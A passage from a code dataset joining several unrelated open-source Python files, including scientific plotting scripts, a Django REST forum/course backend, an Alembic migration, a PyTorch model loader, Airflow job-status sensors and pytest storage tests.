pico_rel.drop_duplicates(subset=['Latitude','Longitude'],keep='last')\npico_rel = pico_rel[pico_rel['Abundance'] > 0.0]\n\ndef color_levels(abundance):\n if abundance < 1:\n return 'slategrey'\n elif abundance < 5:\n return 'darkviolet'\n elif abundance < 10:\n return 'midnightblue'\n elif abundance < 20:\n return 'orangered'\n elif abundance >= 20:\n return 'darkred'\npico_rel['color'] = pico_rel['Abundance'].apply(lambda x: color_levels(x))\n\n\nfig, ax = plt.subplots(figsize=(20,10), frameon=False)\nm = Basemap(projection='cyl', llcrnrlat=-75, urcrnrlat=75,\n llcrnrlon=-165, urcrnrlon=85, resolution='l', ax=ax)\nm.shadedrelief()\n# m.fillcontinents(color=\"#FFDDCC\", lake_color='#DDEEFF')\n# m.drawmapboundary()\n# m.drawcoastlines(color='gray', linestyle='dotted')\nscat = m.scatter(pico_rel['Longitude'], pico_rel['Latitude'], latlon=True,\n c=pico_rel['Abundance'], cmap=sns.color_palette(\"light:r\", as_cmap=True),\n alpha=0.5, s=pico_rel['Abundance']*15, norm=LogNorm())\n # c=pico_rel['color'], alpha=0.5, s=pico_rel['Abundance']*15)\nm.scatter(-122.013, 36.748, latlon=True, c='black', alpha=1, s=40, marker=\"^\")\nm.scatter(-122.357, 36.695, latlon=True, c='black', alpha=1, s=40, marker=\"^\")\nm.scatter(-123.49, 36.126, latlon=True, c='black', alpha=1, s=40, marker=\"^\")\nm.scatter(19.8633, 58.4880, latlon=True, c='black', alpha=1, s=40, marker=\"^\")\n# 'gist_heat_r' pico_rel['col'] sns.color_palette(\"Spectral_r\", as_cmap=True)\n# plt.colorbar(scat, label='relative abundance [%]', ax=ax)\nfor a, l in zip([0.1, 1, 10, 30], [\"0.1%\",\"1%\",\"10%\",\"30%\"]):\n plt.scatter([], [], c='k', alpha=0.5, s=a*15,\n label=l, norm=LogNorm(), cmap=sns.color_palette(\"light:r\", as_cmap=True))\nplt.scatter([], [], c='black', alpha=1, s=40, label='SAG sampling', marker=\"^\")\nplt.legend(scatterpoints=1, frameon=False,\n labelspacing=1, loc='lower left')\nplt.tight_layout()\nplt.savefig('Tara_abundances.pdf')\nplt.close()\n","repo_name":"maxemil/picozoa-scripts","sub_path":"distribution_diversity/get_tara_otus.py","file_name":"get_tara_otus.py","file_ext":"py","file_size_in_byte":4132,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"71039437053","text":"import os\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nLANDMARK_DIR = '/Users/lucas/My Repo/Active Shape Model/muct-master/muct-landmarks/split/i000qa-fn.txt'\nIMAGE_DIR = '/Users/lucas/My Repo/Active Shape Model/muct-master/a/debug/i000qa-fn.jpg'\nLANDMARK_AMOUNT = 76\n\ndata = np.loadtxt(LANDMARK_DIR)\nx = data[::2, ]\ny = data[1::2, ]\n\nlands = np.hstack((x, y))\n_lands = np.array_split(lands, 2)\nlands1 = np.ndarray.flatten(_lands[0][:])\nlands2 = np.ndarray.flatten(_lands[1][:])\n\n#imageFile = r'i000qa-fn.jpg'\n#image = cv2.cvtColor(cv2.imread(IMAGE_DIR), cv2.COLOR_BGR2GRAY)\n\nim = plt.imread(IMAGE_DIR)\nplt.imshow(im)\nplt.scatter(lands1, lands2)\nplt.show()\n\n# plt.figure(1)\n# plt.imshow(image)\n#plt.scatter(lands1, lands2)\n# plt.show()\n\n\"\"\" for i in range(len(lands1)):\n\n cx = lands1[1]\n cy = lands2[i]\n\n cv2.circle(image, (int(cx), int(cy)), 10, (255, 255, 255), -11)\n cv2.circle(image, (int(cx), int(cy)), 11, (0, 0, 255), 1) # draw circle\n cv2.ellipse(image, (int(cx), int(cy)), (10, 10), 0, 0, 90, (0, 0, 255), -1)\n cv2.ellipse(image, (int(cx), int(cy)), (10, 10),\n 0, 180, 270, (0, 0, 255), -1)\n cv2.circle(image, (int(cx), int(cy)), 1, (0, 255, 0), 1) # draw center\n cv2.putText(image, str(i), (int(cx)+10, int(cy)-10),\n cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (255, 180, 180)) \"\"\"\n\n#print 'plot points completed'\n#cv2.imshow('ImageWindow', image)\n# cv2.waitKey()\n\n#outputfile = 'PlotPoint'+imageFile\n#cv2.imwrite(outputfile, image)\n","repo_name":"lucasbrito92/opencv-plot","sub_path":"testeplot.py","file_name":"testeplot.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33880888366","text":"from collections import OrderedDict\r\n\r\nfrom rdkit import Chem\r\nfrom rdkit.Chem import Descriptors, Crippen, Lipinski, QED\r\n\r\n\r\nMOLECULE_PROPERTIES = OrderedDict({\r\n 'LogP': Crippen.MolLogP,\r\n 'Molecular Weight': Descriptors.MolWt,\r\n 'Polar Surface Area': lambda mol: QED.properties(mol).PSA,\r\n 'Number of Rotatable Bonds': Lipinski.NumRotatableBonds,\r\n 'FSP3': Lipinski.FractionCSP3\r\n})\r\n\r\n\r\ndef get_props(smiles, options):\r\n mol = Chem.MolFromSmiles(smiles)\r\n\r\n if mol is None:\r\n return None\r\n\r\n def get_value(value_func):\r\n return round(value_func(mol), int(options['precision']))\r\n\r\n mol_props = {prop_name: [0, get_value(value_func), \"\", \"\"] for (prop_name, value_func) in MOLECULE_PROPERTIES.items() if prop_name in options}\r\n\r\n return mol_props\r\n","repo_name":"jimmyjbling/Stoplight","sub_path":"Stoplight/prop_calculator.py","file_name":"prop_calculator.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"18023260284","text":"from flask import Blueprint, render_template, Response, request, redirect, url_for\r\nfrom flask_login import login_user, login_required, logout_user, current_user\r\nfrom .auth import webcam_release\r\n\r\nviews = Blueprint('views', __name__)\r\n\r\n\r\n@views.route('/',methods=['GET', 'POST'])\r\n@login_required\r\ndef home():\r\n if request.method == 'POST':\r\n webcam_release()\r\n logout_user()\r\n return redirect(url_for('auth.login'))\r\n return render_template('home.html', user=current_user)\r\n\r\n","repo_name":"IBM-EPBL/IBM-Project-20102-1659712615","sub_path":"Application Building/Building Flask Application-Part 3/Website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"42127454447","text":"import os\nimport argparse\nfrom collections import OrderedDict\n\nimport torch\nimport logging\n\nimport models.resnet\nfrom utils.YParams import YParams\nfrom utils.data_loader import get_data_loader\n\ndef load_experiment(yaml_config_file='./config/photoz.yaml', config='default', load_best_ckpt=True, device=torch.cuda.current_device()):\n params = YParams(yaml_config_file, config)\n\n # setup output directory\n expDir = os.path.join('./expts', config)\n if not os.path.isdir(expDir):\n logging.error(\"%s not found\"%expDir)\n exit(1)\n\n params['experiment_dir'] = os.path.abspath(expDir)\n params['checkpoint_path'] = os.path.join(expDir, 'checkpoints/ckpt.tar')\n\n if not os.path.isfile(params.checkpoint_path):\n logging.error(\"%s not found\"%params.checkpoint_path)\n exit(1)\n\n if load_best_ckpt and not os.path.isfile(params.checkpoint_path.replace('.tar', '_best.tar')):\n logging.warning(\"No best checkpoint exists, loading last checkpoint instead\")\n load_best_ckpt = False\n\n params.log()\n params['log_to_screen'] = True\n\n checkpoint_path = params.checkpoint_path\n if load_best_ckpt:\n checkpoint_path = checkpoint_path.replace('.tar', '_best.tar')\n\n model = load_model_from_checkpoint(checkpoint_path, params.num_channels, num_classes=params.num_classes, device=device)\n\n return model, params\n\ndef load_model_from_checkpoint(checkpoint_path, num_channels=5, num_classes=180, device=torch.cuda.current_device()):\n model = models.resnet.resnet50(num_channels=num_channels, num_classes=num_classes).to(device)\n\n logging.info(\"Loading checkpoint %s\"%checkpoint_path)\n restore_checkpoint(model, checkpoint_path)\n\n return model\n\ndef restore_checkpoint(model, checkpoint_path):\n checkpoint = torch.load(checkpoint_path, map_location='cuda:0')\n\n # some checkpoints have a different name for the model key\n model_key = 'model_state' if 'model_state' in checkpoint else 'state_dict'\n\n new_model_state = OrderedDict()\n for key in checkpoint[model_key].keys():\n if 'encoder' in key:\n if 'encoder_q' in key:\n name = str(key).replace('module.encoder_q.', '')\n new_model_state[name] = checkpoint[model_key][key]\n elif 'module.' in key:\n name = str(key).replace('module.', '')\n new_model_state[name] = checkpoint[model_key][key]\n\n msg = model.load_state_dict(new_model_state, strict=False)\n if msg.missing_keys == ['fc.weight', 'fc.bias']:\n logging.info(\"Printing a pretrained model without FC layers\")\n model.fc = Identity()\n\n logging.info(\"Chekpoint loaded. Checkpoint epoch %d\"%checkpoint['epoch'])\n\nclass Identity(torch.nn.Module):\n def __init__(self):\n super(Identity, self).__init__()\n\n def forward(self, x):\n return x\n","repo_name":"mahayat/ssl-sky-surveys","sub_path":"utils/load_trained_model.py","file_name":"load_trained_model.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"78"} +{"seq_id":"70176538493","text":"\"\"\"empty message\n\nRevision ID: 269292b8628d\nRevises: 2d9d8f4b00c5\nCreate Date: 2015-11-17 23:41:29.110105\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '269292b8628d'\ndown_revision = '2d9d8f4b00c5'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('team',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=80), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name')\n )\n op.add_column(u'user', sa.Column('team_id', sa.Integer(), nullable=True))\n op.drop_constraint(u'user_org_id_fkey', 'user', type_='foreignkey')\n op.create_foreign_key(None, 'user', 'team', ['team_id'], ['id'])\n op.drop_column(u'user', 'org_id')\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column(u'user', sa.Column('org_id', sa.INTEGER(), autoincrement=False, nullable=True))\n op.drop_constraint(None, 'user', type_='foreignkey')\n op.create_foreign_key(u'user_org_id_fkey', 'user', 'org', ['org_id'], ['id'])\n op.drop_column(u'user', 'team_id')\n op.drop_table('team')\n ### end Alembic commands ###\n","repo_name":"ijoosong/cassidy_backend","sub_path":"migrations/versions/269292b8628d_.py","file_name":"269292b8628d_.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29098794597","text":"# _*_ encoding:utf-8 _*_\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.parsers import JSONParser\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\n\nfrom operations.models import UserHistory,UserMessage,UserProblem,UserComment,UserNotebook\nfrom operations.serializers import UserHistorySerializer,UserMessageSerializer,UserProblemSerializer,UserCommentSerializer,\\\n PublishSerializer,MyProblemSerializer,PublisherSerializer,SearchInfoSerializer,UserNotebookSerializer,SubmitCommentSerializer,SendMessageSerializer,\\\n SubmitNotebookSerializer\nfrom users.models import UserProfile\nfrom courses.models import Chapter\nfrom courses.serializers import ChapterSerializer\nfrom others.models import News,AnswerQuestion\nfrom others.serializers import NewsDetailSerializer,AnswerQuestionDetailSerializer\n\n\n\n# Create your views here.\n\n\n#浏览历史响应函数(进度百分比)\n@csrf_exempt\n@api_view(['GET'])\ndef UserHistoryView(request):\n if request.method == 'GET':\n user_id = request.GET['userid']\n historyinfo = UserHistory.objects.filter(user_id=user_id)\n history_serializer = UserHistorySerializer(historyinfo,many=True)\n history_res = {\n \"success\":True,\n \"data\":history_serializer.data\n }\n return Response(history_res)\n else:\n history_res = {\n \"success\":False,\n }\n return Response(history_res)\n\n\n#消息列表响应函数\n@csrf_exempt\n@api_view(['GET'])\ndef UserMessageView(request):\n if request.method == 'GET':\n user_id = request.GET['userid']\n UserMessage.objects.filter(user_id=user_id).update(message_hasread=True)\n message_info = UserMessage.objects.filter(user_id=user_id)\n message_serializer = UserMessageSerializer(message_info,many=True)\n message_res = {\n \"success\": True,\n \"data\": message_serializer.data\n }\n return Response(message_res)\n else:\n message_res = {\n \"success\":False,\n \"data\":{}\n }\n return Response(message_res)\n\n\n#消息删除响应函数\n@csrf_exempt\n@api_view(['GET'])\ndef MessageDeleteView(request):\n if request.method == 'GET':\n message_id = request.GET['msgid']\n user_id = request.GET['userid']\n message_info = UserMessage.objects.filter(id=message_id).first()\n message_info.delete()\n message_remain = UserMessage.objects.filter(user_id=user_id)\n message_serializer = UserMessageSerializer(message_remain, many=True)\n message_res = {\n \"success\": True,\n \"data\": message_serializer.data\n }\n return Response(message_res)\n else:\n message_res = {\n \"success\": False,\n \"data\":{}\n }\n return Response(message_res)\n\n\n#问题列表响应函数\n@csrf_exempt\n@api_view(['GET'])\ndef ProblemListView(request):\n if request.method == 'GET':\n problem_info = UserProblem.objects.all()\n problem_serializer = UserProblemSerializer(problem_info,many=True)\n problem_res = {\n \"success\":True,\n \"data\":problem_serializer.data\n }\n return Response(problem_res)\n else:\n problem_res = {\n \"success\":False,\n \"data\":{}\n }\n return Response(problem_res)\n\n\n#问题详情响应函数\n@csrf_exempt\n@api_view(['GET'])\ndef ProblemDetailView(request):\n if request.method == 'GET':\n problem_id = request.GET['id']\n problem_info = UserProblem.objects.filter(id=problem_id).first()\n comment_info = UserComment.objects.filter(comment_to=problem_id)\n problem_serializer = UserProblemSerializer(problem_info)\n comment_serializer = UserCommentSerializer(comment_info,many=True)\n publisher_serializer = PublisherSerializer(problem_info)\n problemdetail_res = {\n \"success\":True,\n \"data\":{\n \"publisher\":publisher_serializer.data,\n \"comment\":comment_serializer.data,\n \"problem\":problem_serializer.data\n }\n }\n return Response(problemdetail_res)\n else:\n problemdetail_res = {\n \"success\":False,\n \"data\":{}\n }\n return Response(problemdetail_res)\n\n\n#删除问题响应函数\n@csrf_exempt\n@api_view(['GET'])\ndef DeleteProblemView(request):\n if request.method == 'GET':\n problem_id = request.GET['problemid']\n problem_info = UserProblem.objects.filter(id=problem_id).first()\n problem_info.delete()\n delete_res = {\n \"success\":True\n }\n return Response(delete_res)\n else:\n delete_res = {\n \"success\":False\n }\n return Response(delete_res)\n\n\n#删除评论响应函数\n@csrf_exempt\n@api_view(['GET'])\ndef DeleteCommentView(request):\n if request.method == 'GET':\n problem_id = request.GET['problemid']\n comment_id = request.GET['commentid']\n comment_info = UserComment.objects.filter(id=comment_id).first()\n comment_info.delete()\n problem_info = UserProblem.objects.filter(id=problem_id).first()\n problem_info.comment_num -= 1\n problem_info.save()\n delete_res = {\n \"success\":True\n }\n return Response(delete_res)\n else:\n delete_res = {\n \"success\":False\n }\n return Response(delete_res)\n\n\n#点赞评论响应函数\n@csrf_exempt\n@api_view(['GET'])\ndef PraiseCommentView(request):\n if request.method == 'GET':\n comment_id = request.GET['commentid']\n comment_info = UserComment.objects.filter(id=comment_id).first()\n comment_info.comment_agree += 1\n comment_info.save()\n praise_res = {\n \"success\": True,\n }\n return Response(praise_res)\n else:\n praise_res = {\n \"success\": False,\n }\n return Response(praise_res)\n\n\n#发送消息响应函数\n@csrf_exempt\n@api_view(['POST'])\ndef SendMessageView(request):\n if request.method == 'POST':\n message_serializer = SendMessageSerializer(data=request.data)\n if message_serializer.is_valid():\n message_serializer.save()\n sendMsg_res = {\n \"success\": True,\n \"data\": {\n \"sendMsg\": True\n }\n }\n return Response(sendMsg_res)\n else:\n sendMsg_res = {\n \"success\": True,\n \"data\": {\n \"sendMsg\": False\n }\n }\n return Response(sendMsg_res)\n else:\n sendMsg_res = {\n \"success\": False,\n \"data\": {}\n }\n return Response(sendMsg_res)\n\n\n#问题发布响应函数\n@csrf_exempt\n@api_view(['POST'])\ndef PublishView(request):\n if request.method == 'POST':\n problem_serializer = PublishSerializer(data=request.data)\n if problem_serializer.is_valid():\n problem_serializer.save()\n publish_res = {\n \"success\":True,\n \"publish\":True\n }\n return Response(publish_res)\n else:\n publish_res = {\n \"success\":True,\n \"publish\":False\n }\n return Response(publish_res)\n else:\n publish_res = {\n \"success\":False,\n \"publish\":False\n }\n return Response(publish_res)\n\n\n#我的问题响应函数\n@csrf_exempt\n@api_view(['GET'])\ndef MyProblemView(request):\n if request.method == 'GET':\n user_id = request.GET['userid']\n myproblem_info = UserProblem.objects.filter(user_id=user_id)\n myproblem_serializer = MyProblemSerializer(myproblem_info,many=True)\n myproblem_res = {\n \"success\":True,\n \"data\":myproblem_serializer.data\n }\n return Response(myproblem_res)\n else:\n myproblem_res = {\n \"success\":False,\n \"data\":{}\n }\n return Response(myproblem_res)\n\n\n#搜索下拉栏响应函数\n@csrf_exempt\n@api_view(['GET'])\ndef SearchInfoView(request):\n if request.method == 'GET':\n keyword = request.GET['searchinfo']\n chapter_num = Chapter.objects.filter(chapter_name__contains=keyword).count()\n problem_num = UserProblem.objects.filter(problem_title__contains=keyword).count()\n news_num = News.objects.filter(news_title__contains=keyword).count()\n question_num = AnswerQuestion.objects.filter(answer_title__contains=keyword).count()\n searchinfo_res = {\n \"success\":True,\n \"data\":[\n {\n \"msgNum\":chapter_num,\n \"type\":\"课程\",\n \"type_e\":\"class\",\n \"keyword\":keyword\n },\n {\n \"msgNum\": problem_num,\n \"type\": \"问题\",\n \"type_e\": \"problem\",\n \"keyword\": keyword\n },\n {\n \"msgNum\": news_num,\n \"type\": \"新闻\",\n \"type_e\": \"news\",\n \"keyword\": keyword\n },\n {\n \"msgNum\": question_num,\n \"type\": \"官方答疑\",\n \"type_e\": \"question\",\n \"keyword\": keyword\n }\n ]\n }\n return Response(searchinfo_res)\n else:\n searchinfo_res = {\n \"success\":False,\n \"data\":{}\n }\n return Response(searchinfo_res)\n\n\n\n#搜索结果响应函数\n@csrf_exempt\n@api_view(['POST'])\ndef SearchSubmitView(request):\n if request.method == 'POST':\n keyword = request.data['keyword']\n type = request.data['type']\n# keyword = request.POST.getlist('keyword')\n# type = request.POST.getlist('type')\n if type == \"class\":\n chapter_info = Chapter.objects.filter(chapter_name__contains=keyword)\n chapter_serializer = ChapterSerializer(chapter_info, many=True)\n searchinfo_res = {\n \"success\": True,\n \"data\": chapter_serializer.data\n }\n return Response(searchinfo_res)\n elif type == \"problem\":\n problem_info = UserProblem.objects.filter(problem_title__contains=keyword)\n problem_serializer = UserProblemSerializer(problem_info, many=True)\n searchinfo_res = {\n \"success\": True,\n \"data\": problem_serializer.data\n }\n return Response(searchinfo_res)\n elif type == \"news\":\n news_info = News.objects.filter(news_title__contains=keyword)\n news_serializer = NewsDetailSerializer(news_info, many=True)\n searchinfo_res = {\n \"success\": True,\n \"data\": news_serializer.data\n }\n return Response(searchinfo_res)\n elif type == \"question\":\n ques_info = AnswerQuestion.objects.filter(answer_title__contains=keyword)\n ques_serializer = AnswerQuestionDetailSerializer(ques_info, many=True)\n searchinfo_res = {\n \"success\": True,\n \"data\": ques_serializer.data\n }\n return Response(searchinfo_res)\n else:\n searchinfo_res = {\n \"success\":False,\n \"data\":{}\n }\n return Response(searchinfo_res)\n\n\n#笔记显示及提交响应函数\n@csrf_exempt\n@api_view(['GET','POST'])\ndef UserNotebookView(request):\n if request.method == 'GET':\n user_id = request.GET.get('userid')\n lesson_id = request.GET.get('classid')\n note_info = UserNotebook.objects.filter(user_id=user_id,lesson_id=lesson_id).first()\n note_serializer = UserNotebookSerializer(note_info)\n note_res = {\n \"success\":True,\n \"data\":note_serializer.data\n }\n return Response(note_res)\n elif request.method == 'POST':\n user_id = request.data.get('user_id')\n lesson_id = request.data.get('lesson_id')\n# user_id = request.POST.get('userid')\n# lesson_id = request.POST.get('lesson_id')\n notebook_content = request.POST.get('notebook_content')\n note_serializer = SubmitNotebookSerializer(data=request.data)\n if note_serializer.is_valid():\n note_info = UserNotebook.objects.filter(user_id=user_id, lesson_id=lesson_id).first()\n if note_info :\n note_info.delete()\n note_serializer.save()\n note_res = {\n \"success\":True,\n \"data\":{\n \"note\":True,\n \"test\":note_serializer.data\n }\n }\n return Response(note_res)\n else:\n note_res = {\n \"success\":True,\n \"data\":{\n \"note\":False\n }\n }\n return Response(note_res)\n else:\n note_res = {\n \"success\":False,\n \"data\":{}\n }\n return Response(note_res)\n\n\n#评论提交响应函数\n@csrf_exempt\n@api_view(['POST'])\ndef SubmitCommentView(request):\n if request.method == 'POST':\n comment_to = request.data['comment_to']\n comment_serializer = SubmitCommentSerializer(data=request.data)\n if comment_serializer.is_valid():\n problem_info = UserProblem.objects.filter(id=comment_to).first()\n problem_info.comment_num += 1\n problem_info.save()\n comment_serializer.save()\n sub_res = {\n \"success\":True,\n \"data\":comment_serializer.data\n }\n return Response(sub_res)\n else:\n sub_res = {\n \"success\":True,\n \"data\":{}\n }\n return Response(sub_res)\n else:\n sub_res = {\n \"success\": False,\n \"data\": {}\n }\n return Response(sub_res)\n\n","repo_name":"hexoctal-sur/beautify_the_page","sub_path":"public/server/apps/operations/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16981329","text":"# -*- coding:utf-8 -*-\n\nimport argparse\nimport torch\nimport scipy.io as sio\nfrom torchvision.utils import save_image\nfrom basic_unet import UNet\nfrom Dataset import *\nimport cv2\n\n\"\"\" set flags / seeds \"\"\"\ntorch.backends.cudnn.benchmark = True\nos.environ['CUDA_VISIBLE_DEVICES'] = '1'\nparser = argparse.ArgumentParser(description=\"\")\nparser.add_argument('--batch_size', type=int, default=1)\nparser.add_argument('--data_path', type=str, default='/home/Data/Data/CNV/Model_data/train1')\nparser.add_argument('--model_path', type=str,\n default='logs/gen_pix2pix_[lr=150.0]_five_fold_2/model_G_140000lp_0.400.ckpt')\nparser.add_argument('--results_dir', type=str, default='/home/Data/Data/CNV/Model_data/results_our_new/five_fold_2')\nopt = parser.parse_args()\n\nresults_realA = os.path.join(opt.results_dir, 'realA')\nif not os.path.exists(results_realA):\n os.makedirs(results_realA)\nresults_realB = os.path.join(opt.results_dir, 'realB')\nif not os.path.exists(results_realB):\n os.makedirs(results_realB)\n\nresults_fakeB = os.path.join(opt.results_dir, 'fakeB')\nif not os.path.exists(results_fakeB):\n os.makedirs(results_fakeB)\n\nif __name__ == \"__main__\":\n\n \"\"\" datasets and dataloader \"\"\"\n test_loader = get_data_loaders(opt, 'test')\n\n \"\"\" instantiate network and loss function\"\"\"\n # netG = networks.define_G(3, 1, 64, 'global',\n # n_downsample_global=4, n_blocks_global=9, n_local_enhancers=1,\n # n_blocks_local=3, norm = 'instance', gpu_ids=0)\n\n \"\"\" device configuration \"\"\"\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\n netG = UNet(n_in=7, n_out=1, first_channels=32, n_dps=5, use_pool=True, use_bilinear=True,\n norm_type='instance', device=device)\n\n \"\"\"models init or load checkpoint\"\"\"\n # print(torch.load(opt.model_save_path))\n netG.load_state_dict(torch.load(opt.model_path)['netG'])\n\n print('ok')\n\n netG = netG.to(device)\n netG.eval()\n ssim = 0\n\n with torch.no_grad():\n\n for _, sampled_batch_test in enumerate(test_loader):\n real_A, real_B = sampled_batch_test['images'], sampled_batch_test['labels']\n\n # real_A_mid = np.array(real_A_mid.cpu())\n # real_B = real_B[0, 0, :, :]\n # real_B = np.array(real_B.cpu())\n\n real_A = real_A.to(device)\n real_B = real_B.to(device)\n\n fake_B, _ = netG(real_A)\n # fake_B = np.array(fake_B.cpu())\n # fake_B = fake_B[0, 0, :, :]\n real_A_mid = real_A[:, 3, :, :].unsqueeze(1)\n real_B_mid = real_B[:, 3, :, :].unsqueeze(1)\n\n filename = sampled_batch_test['filename']\n filename = filename[0]\n\n # sio.savemat(os.path.join(opt.results_dir, filename), {'realA': real_A_mid, 'realB': real_B, 'fakeB': fake_B})\n\n save_image(real_A_mid, os.path.join(results_realA, filename + '.png'))\n save_image(real_B_mid, os.path.join(results_realB, filename+'.png'))\n save_image(fake_B, os.path.join(results_fakeB, filename + '.png'))\n\n # gen_label = gen_label.mul(255).add_(0.5).clamp_(0, 255).to('cpu', torch.uint8).numpy()\n # seg_out = seg_out.mul(255).add_(0.5).clamp_(0, 255).to('cpu', torch.uint8).numpy()\n # ssim += compare_ssim(gen_label, seg_out)\n\n # ssim /= len(test_dataset)\n # os.rename(opt.img_save_dir, opt.img_save_dir+'ssim_%.3f'%ssim)\n","repo_name":"ZhangYH0502/SHENet","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7275553593","text":"from airflow import AirflowException\nfrom airflow.operators.sensors import BaseSensorOperator\nfrom airflow.utils.decorators import apply_defaults\n\nfrom hooks.hortonworks_ambari_hook import HdpAmbariHook\n\n\nclass AzureHortonWorksBase(BaseSensorOperator):\n\n @apply_defaults\n def __init__(self, ambari_conn_id='hortonworks_ambari_default',\n *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.ambari_conn_id = ambari_conn_id\n self.hook: HdpAmbariHook = HdpAmbariHook(ambari_conn_id=self.ambari_conn_id)\n\n self.non_terminated_status_list = ['INIT', 'starting', 'running', 'waiting',\n 'available', 'not_started', 'busy', 'RUNNING', 'PREP']\n\n self.failed_status_list = ['error', 'cancelling', 'cancelled', 'shutting_down',\n 'dead', 'killed', 'KILLED', 'FAILED']\n\n def check_spark_status(self, job_id) -> bool:\n statements_state = self.hook.get_spark_job_status(job_id) or 'INIT'\n if statements_state in self.non_terminated_status_list:\n self.log.debug(\"Checking Hive job: %s\", statements_state)\n return False\n elif statements_state in self.failed_status_list:\n result = \"job failed. state: %s\", statements_state\n self.log.error(result)\n raise AirflowException(result)\n else:\n self.log.debug(\"Checking Spark job: %s\", statements_state)\n return True\n\n def check_hive_status(self, job_id) -> bool:\n status = self.hook.get_hive_job_status(job_id)\n statements_state = status[\"state\"]\n statements_exit_value = status[\"exitValue\"]\n # Check submitted job's result\n if statements_state in self.failed_status_list or statements_exit_value != \"0\":\n result = \"job failed. state: %s, exitValue: \", statements_state, statements_exit_value\n self.log.error(result)\n raise AirflowException(result)\n elif statements_state in self.non_terminated_status_list:\n self.log.debug(\"Checking Hive job: %s\", statements_state)\n return False\n else:\n self.log.debug(\"Statement %s \", statements_state)\n self.log.debug(\n f\"Finished executing WebHCatHiveSubmitOperator with status: {statements_state} : {statements_exit_value}\")\n return True\n","repo_name":"alikemalocalan/airflow-hdinsight-operators","sub_path":"sensors/azure_hortonworks_base.py","file_name":"azure_hortonworks_base.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"78"} +{"seq_id":"34174924125","text":"from .storage import *\n\nimport pytest\n\nfrom .serialization_helpers import get_uuid\nfrom .test_utils import all_objects, UnnamedUUID, MockUUIDObject, MockStorage\n\n\nclass TestStorageTable(object):\n def setup_method(self):\n self.storage = MockStorage()\n # Override default tables/uuids\n self.storage.backend.table_names = [\"all\"]\n self.obj_list = list(all_objects.values())\n self.storage.backend.tables = [self.obj_list]\n self.storage.backend.uuid_table = {\n e.uuid:\n self.storage.backend.row_types[\"uuids\"](uuid=e.uuid, table=0,\n idx=i)\n for i, e in enumerate(self.obj_list)}\n self.table = StorageTable(self.storage, \"all\")\n\n def test_iter(self):\n pytest.skip()\n\n def test_getitem(self):\n pytest.skip()\n\n def test_len(self):\n pytest.skip()\n\n def test_save(self):\n pytest.skip()\n\n @pytest.mark.parametrize(\"s\", [slice(None), # [:]\n slice(5), # [:5]\n slice(-5), # [:-5]\n slice(1, 2), # [1:2]\n slice(100), # longer slice than possible\n slice(6, 4, -1), # [6:4:-1]\n slice(5, 5), # empty\n ])\n def test_getslice(self, s):\n truths = self.obj_list[s]\n tests = self.table[s]\n for i, j in zip(truths, tests):\n assert i == j\n\n def test_bogus_access(self):\n with pytest.raises(TypeError, match=\"type tuple\"):\n self.table[(1, 2, 3)]\n\n\nclass TestPseudoTable(object):\n def setup_method(self):\n self.objs = {None: UnnamedUUID(normal_attr=10)}\n self.objs.update(all_objects)\n self.obj_list = list(self.objs.values())\n self.pseudo_table = PseudoTable(self.obj_list)\n\n @pytest.mark.parametrize('name', ['int', None])\n def test_get_by_uuid(self, name):\n obj = self.objs[name]\n uuid = get_uuid(obj)\n expected = self.objs[name]\n assert self.pseudo_table.get_by_uuid(uuid) == expected\n\n @pytest.mark.parametrize('name', ['int', None])\n def test_getitem(self, name):\n obj = self.objs[name]\n idx = self.pseudo_table.index(obj)\n assert self.pseudo_table[idx] == obj\n if name is not None:\n assert self.pseudo_table[name] == obj\n\n @pytest.mark.parametrize(\"s\", [slice(None), # [:]\n slice(5), # [:5]\n slice(-5), # [:-5]\n slice(1, 2), # [1:2]\n slice(100), # longer slice than possible\n slice(6, 4, -1), # [6:4:-1]\n slice(5, 5), # empty\n ])\n def test_getslice(self, s):\n truths = self.obj_list[s]\n tests = self.pseudo_table[s]\n for i, j in zip(truths, tests):\n assert i == j\n\n def test_bogus_access(self):\n with pytest.raises(TypeError, match=\"tuple\"):\n self.pseudo_table[(1, 2, 3)]\n\n @pytest.mark.parametrize('name', ['int2', None])\n def test_setitem(self, name):\n value = {'int2': 20, None: 21}[name]\n item = {'int2': MockUUIDObject(name=\"int2\", normal_attr=value),\n None: UnnamedUUID(normal_attr=value)}[name]\n\n len_table = len(self.pseudo_table)\n\n self.pseudo_table[len_table-1] = item\n assert item in self.pseudo_table\n assert 